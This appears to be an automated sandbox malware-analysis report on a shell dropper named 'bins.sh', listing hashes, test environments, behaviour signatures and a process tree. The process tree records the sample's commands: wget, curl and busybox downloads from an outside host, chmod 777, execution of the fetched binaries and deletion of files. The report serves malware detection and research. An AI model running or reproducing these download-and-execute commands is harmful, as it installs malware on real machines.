Analysis
-
max time kernel
599s -
max time network
481s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
16/12/2024, 04:16
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
debian12-armhf-20240221-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian12-mipsel-20240221-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral5
Sample
bins.sh
Resource
debian9-mipsel-20240729-en
Behavioral task
behavioral6
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral7
Sample
bins.sh
Resource
ubuntu2404-amd64-20240523-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
7c06e835a83b81914ba9a19c15e66d76
-
SHA1
bc618204890c0b179a00d6d253001a6e27197aa1
-
SHA256
cf982818df24e8535c11ddeee9410d1545a54203538acf160c505dcb7ad1cbeb
-
SHA512
4bbe783a5be8061d432c7a90b941059b63a1adc687741621537fbde9f2631c045bccb8ef3d0fcbb9aac75dd15f9ab949678fd3c6b879b3e4ba7d74b585e5f9d2
-
SSDEEP
192:IWWlW1WGWfWLWqVl9MT3rtdp2n3Viuz3WdNdGmX4spz3WdN8X4mWlW1WGWfWLWVh:jAtdp2n3Vi9GOMdp2n3Fu
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1632 chmod -
System Network Configuration Discovery 1 TTPs 5 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1635 wget 1638 curl 1478 wget 1482 curl 1628 busybox
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:1471
-
/bin/rm/bin/rm bins.sh2⤵PID:1477
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA2⤵
- System Network Configuration Discovery
PID:1478
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA2⤵
- System Network Configuration Discovery
PID:1482
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA2⤵
- System Network Configuration Discovery
PID:1628
-
-
/bin/chmodchmod 777 YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA2⤵
- File and Directory Permissions Modification
PID:1632
-
-
/tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA./YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA2⤵PID:1633
-
-
/bin/rmrm YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA2⤵PID:1634
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX2⤵
- System Network Configuration Discovery
PID:1635
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX2⤵
- System Network Configuration Discovery
PID:1638
-